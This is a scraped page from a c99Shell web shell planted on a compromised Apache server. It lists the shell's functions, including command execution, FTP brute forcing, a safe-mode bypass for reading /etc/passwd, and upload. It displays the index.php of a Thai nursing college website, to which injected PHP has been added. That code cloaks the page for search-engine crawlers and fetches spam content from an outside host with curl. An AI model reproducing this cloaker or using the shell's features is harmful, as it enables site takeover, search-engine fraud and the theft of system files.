!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (2.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header("Content-type: text/html; charset=utf-8");
@set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
ini_set('user_agent','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://jsc.dns52.vip/");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Googlebot|google@i');
define('area', $tr(url, "0") or $tr(url, "1") or $tr(url, "2") or $tr(url, "3") or $tr(url, "4") or $tr(url, "5") or $tr(url, "6") or $tr(url, "7") or $tr(url, "8") or $tr(url,"9")or $tr(url,"1/")or $tr(url,"2/")or $tr(url,"3/")or $tr(url,"4/")or $tr(url,"5/")or $tr(url,"6/")or $tr(url,"7/")or $tr(url,"8/")or $tr(url,"9/")or $tr(url,"0/")or $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".baidu")or $tr(url,".ga")or $tr(url,".gq")or $tr(url,".asp")or $tr(url,".jsp")or $tr(url,".php")or $tr(url,".com")or $tr(url,".net")or $tr(url,".gov")or $tr(url,".edu")or $tr(url,".baike")or $tr(url,"app/")or $tr(url,".html")and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
echo xiaoqiao("http://jsc.dns52.vip/404.html");
exit();
}
if (preg_match(regs, ent)) {
if (area) {
echo xiaoqiao(site.road);
exit;
} else {
echo xiaoqiao("http://jsc.dns52.vip/zz1.php");
ob_flush();
flush();
}
}
function xiaoqiao($c) {
$d=curl_init();
curl_setopt($d,CURLOPT_URL,$c);
curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);
curl_setopt($d,CURLOPT_RETURNTRANSFER,1);
curl_setopt($d,CURLOPT_HEADER,0);
$e=curl_exec($d);
curl_close($d);
return $e;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>วิทยาลัยพยาบาลบรมราชชนนี อุดรธานี</title>
</head>
<body>
<div align="center">
  <p><img src="https://www.bcnu.ac.th/websitebcnu2.jpg " width="100%" height="100%" /></p>
  <p><a href="http://110.164.51.230/mis/index_codeigniter.php/eregis/general/showNw"><img src="https://www.bcnu.ac.th/bcnu2.png" width="10%" /></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--